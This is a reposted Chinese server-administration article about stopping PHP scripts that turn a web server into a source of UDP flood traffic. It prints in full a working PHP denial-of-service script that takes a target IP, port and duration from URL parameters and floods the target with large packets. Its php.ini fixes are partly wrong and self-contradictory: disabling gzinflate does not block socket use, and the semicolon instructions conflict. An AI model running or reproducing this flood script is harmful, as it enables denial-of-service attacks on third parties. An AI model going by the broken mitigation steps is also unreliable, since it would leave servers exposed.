当前位置: 主页 > 服务器技术 >

防止用户利用PHP代码DOS造成用完网络带宽

时间:2010-09-04 23:18来源:f361站长资讯中心 作者:admin 点击:

特征:

用PHP代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:


$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);

$exec_time = $_GET[\'time\'];

$time = time();
print \"Flooded: $ip on port $rand

\";
$max_time = $time+$exec_time;


for($i=0;$i<65535;$i++){
$out .= \"X\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}

$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
?>


表现特征:

一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是不断收到大量数据包.

解决办法:

禁止上述的代码:
在c:\windows\php.ini里设置:
disable_functions =gzinflate;


在c:\windows\php.ini里设其值为Off
allow_url_fopen = Off



并且:

;extension=php_sockets.dll

前面的;号一定要有,意思就是限制用sockets.dll


前面的;号要去掉

然后重启IIS


如果上述方式仍然无效,你可以在IIS中,允许的扩展中,禁止PHP的扩展测试.



特别申明:本站文章均来自网络文摘,如有侵权,请联系我们 ,我们收到后将立即删除!
特别注意:本站属于IT网络文摘站,所有转载文章言论不代表本站观点,本站所提供的照片,插画等,版权归原作者所有。
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
验证码:点击我更换图片
栏目列表
推荐内容

Copyright 2003-2005 中华龙腾网(www.f361.com)
地址:中国.成都 邮编:610039 电话:13880439919(值班)
点击这里给我发消息 QQ:245104558 395441976(已满) MSN:fly361@hotmail.com mailto:webmaster@f361.net
本站CNNIC信息 新网互联授权证明 信息业务经营许可证备案编号:蜀ICP备05005991号